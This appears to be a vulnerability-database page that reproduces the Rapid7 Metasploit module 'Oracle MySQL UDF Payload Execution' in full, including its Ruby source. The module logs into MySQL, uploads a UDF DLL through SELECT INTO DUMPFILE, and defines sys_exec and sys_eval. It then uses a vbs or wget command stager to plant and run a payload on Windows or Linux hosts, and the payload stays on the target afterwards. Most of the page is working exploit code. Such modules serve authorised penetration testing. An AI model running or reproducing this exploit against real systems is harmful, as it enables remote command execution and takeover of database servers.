Oracle MySQL UDF Payload Execution

2017-11-03T09:26:05
ID MSF:EXPLOIT/MULTI/MYSQL/MYSQL_UDF_PAYLOAD
Type metasploit
Reporter Rapid7
Modified 2018-08-20T20:43:07

Description

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           =&gt; 'Oracle MySQL UDF Payload Execution',
        'Description'    =&gt; %q{
          This module creates and enables a custom UDF (user defined function) on the
          target host via the SELECT ... into DUMPFILE method of binary injection. On
          default Microsoft Windows installations of MySQL (=&lt; 5.5.9), directory write
          permissions not enforced, and the MySQL service runs as LocalSystem.

          NOTE: This module will leave a payload executable on the target system when the
          attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
          and sys_exec() functions.
        },
        'Author'         =&gt;
          [
            'Bernardo Damele A. G. &lt;bernardo.damele[at]gmail.com&gt;', # the lib_mysqludf_sys.dll binaries
            'todb', # this Metasploit module
            'h00die' # linux addition
          ],
        'License'        =&gt; MSF_LICENSE,
        'References'     =&gt;
          [
            # Bernardo's work with cmd exec via udf
            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
          ],
        'Platform'       =&gt; ['win', 'linux'],
        'Targets'        =&gt;
          [
            [ 'Windows', {'CmdStagerFlavor' =&gt; 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
            [ 'Linux', {'CmdStagerFlavor' =&gt; 'wget' } ]
          ],
        'DefaultTarget'  =&gt; 0,
        'DisclosureDate' =&gt; 'Jan 16 2009' # Date of Bernardo's blog post.
    ))
    register_options(
      [
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
    ])
  end

  def post_auth?
    true
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def login_and_get_sys_exec
    m = mysql_login(username,password,'mysql')
    return if not m
    @mysql_arch = mysql_get_arch
    @mysql_sys_exec_available = mysql_check_for_sys_exec()
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
      mysql_add_sys_exec
      @mysql_sys_exec_available = mysql_check_for_sys_exec()
    else
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
    end

    return m
  end

  def execute_command(cmd, opts)
    mysql_sys_exec(cmd, datastore['VERBOSE'])
  end

  def exploit
    m = login_and_get_sys_exec()

    if not m
      return
    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    else
      if @mysql_sys_exec_available
        execute_cmdstager({:linemax =&gt; 1500, :nodelete =&gt; true})
        handler
      else
        print_status("MySQL function sys_exec() not available")
        return
      end
    end
    disconnect
  end
end